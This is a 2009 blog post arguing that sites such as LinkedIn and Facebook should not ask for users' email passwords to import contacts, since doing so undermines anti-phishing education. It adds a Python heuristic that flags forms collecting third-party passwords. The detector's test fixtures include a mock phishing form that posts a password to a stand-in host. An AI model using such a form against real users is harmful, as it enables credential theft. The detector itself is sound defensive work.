Archive for April 16th, 2009


Bad Practices #412

Posted by: Joshbw in Uncategorized

Dear Web Developers,

It’s not kosher to request login information for other websites. Both LinkedIn and Facebook are guilty of asking for your various email credentials so they can harvest your address list under the guise of “making it easier to find your friends”, and they are by no means unique in this practice. Doing so does two things. First, it accustoms users to disclosing credentials to websites unrelated to the site the credentials belong to. Phishing is a huge issue, folks, and we have a hard enough time just getting users to check that they really are on their bank’s website. About the last thing we want is to water down that message by training them to hand over credentials on sites they can plainly see are not the site those credentials correspond to. Unless you move to two-factor authentication, the only real defense against phishing is user education and training, and this practice completely torpedoes that effort.

The other issue is that you are adding another link to an already vulnerable chain. Not only does Google have to worry about Gmail credentials being handled properly on its own site (sent only over SSL, hashed in the database, no SQL injection to disclose them, and so on), it now also has to worry about how your site secures those credentials, and it has no control over that at all. And because you need to replay the password to the provider’s login, you cannot store it as a one-way hash the way a login system would; I bet it sits on your servers in plaintext or reversibly encrypted, which is precisely the storage a hash is meant to avoid.

So please, quit asking for credentials to other sites. If you need a user’s address book, ask the provider for a delegated token that the user grants on the provider’s own site (OAuth-style access), not the password. Don’t do what attackers do, or you leave people no easy way to distinguish between the two.

~ Joshbw
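To make the “don’t do what attackers do” point concrete, here is an added example (not code from the post or from any of the sites it names): a small heuristic that a browser extension or a security scanner might use to spot pages that ask for one provider’s password while posting it somewhere else. The provider list, the sample pages and the hostnames (social.example, g00gle-login.example) are constructed for the illustration. The interesting result is that a legitimate “find your friends” importer and a phishing page trip the same rule, while the provider’s own login form does not.

```python
"""Flag forms that collect a third-party provider's password.

Heuristic: a form with a password field whose visible text names a well-known
email provider, but which posts to a domain other than that provider's, looks
exactly like a phishing page. Added example; all data below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed mapping of provider name -> registrable domain that should own the login.
PROVIDERS = {"gmail": "google.com", "yahoo": "yahoo.com", "hotmail": "live.com"}


class FormCollector(HTMLParser):
    """Collect each <form>: its action, whether it has a password input, and its text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False, "text": []}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
            for key in ("placeholder", "name", "id"):  # attribute text users may read
                if a.get(key):
                    self._current["text"].append(a[key])

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"].append(data)

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def registrable_domain(host):
    """Crude eTLD+1: keep the last two labels (good enough for these samples)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def third_party_credential_forms(html, page_url):
    """Return [(provider, domain_the_password_goes_to)] for suspicious forms."""
    collector = FormCollector()
    collector.feed(html)
    page_domain = registrable_domain(urlparse(page_url).hostname or "")
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        blob = " ".join(form["text"]).lower()
        action_host = urlparse(form["action"]).hostname
        # A relative action posts back to the page's own domain.
        action_domain = registrable_domain(action_host) if action_host else page_domain
        for provider, owner in PROVIDERS.items():
            if re.search(r"\b" + provider + r"\b", blob) and action_domain != owner:
                findings.append((provider, action_domain))
    return findings


# Constructed sample pages.
FRIEND_FINDER_HTML = """<html><body><h2>Find your friends</h2>
<form action="/import-contacts" method="post">
  <label>Gmail address</label> <input type="text" name="email">
  <label>Gmail password</label> <input type="password" name="email_password">
  <input type="submit" value="Find friends">
</form></body></html>"""

PHISH_HTML = """<html><body>
<form action="https://g00gle-login.example/collect" method="post">
  <p>Sign in to Gmail</p>
  <input type="text" name="user"> <input type="password" name="pass">
</form></body></html>"""

LEGIT_HTML = """<html><body>
<form action="https://accounts.google.com/signin" method="post">
  <p>Sign in to Gmail</p>
  <input type="email" name="Email"> <input type="password" name="Passwd">
</form></body></html>"""


if __name__ == "__main__":
    for name, html, url in [
        ("friend finder", FRIEND_FINDER_HTML, "https://social.example/find-friends"),
        ("phishing page", PHISH_HTML, "https://g00gle-login.example/"),
        ("real login", LEGIT_HTML, "https://accounts.google.com/signin"),
    ]:
        print(name, "->", third_party_credential_forms(html, url))
```

The importer and the phishing page produce identical findings, so neither a user nor an automated check can tell them apart on this signal alone; the only form that passes is the one hosted by the provider itself, which is the behaviour users should be trained to expect.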